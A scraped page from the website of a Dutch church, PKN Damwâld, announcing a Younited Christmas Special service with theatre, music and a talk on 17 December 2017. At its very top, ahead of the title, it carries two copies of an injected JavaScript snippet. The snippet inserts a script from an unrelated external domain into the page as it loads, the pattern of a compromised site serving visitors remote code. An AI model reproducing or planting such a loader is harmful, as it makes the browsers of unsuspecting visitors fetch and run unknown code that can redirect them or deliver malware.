;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Younited Kerst Special ! - PKN Damwâld

Younited Kerst Special !

Gepubliceerd op: maandag 27 november 2017

Op 17 december is het zover: Younited komt weer met een Kerst Special! Dit jaar zal deze Kerst Special anders zijn dan voorgaande jaren. Ben je ook nieuwsgierig wat er dit jaar zal gebeuren op het podium? Wil jij met eigen ogen zien hoe Kerst vandaag de dag nog steeds relevant is? En ben jij benieuwd wat Jezus ons heeft gebracht met Kerst?
Dan zien we jou graag op zondag 17 december in de Ontmoeting. Het belooft een prachtige dienst te worden met toneel, film, muziek en verhalen over Kerst. Ds. Boukes zal hierover vertellen en de band Sign zorgt voor mooie muziek.
Deze Younited dienst begint om 19.30. De deuren gaan open om 19.00. Na de dienst staat er een hapje en een drankje klaar in ’t Honk.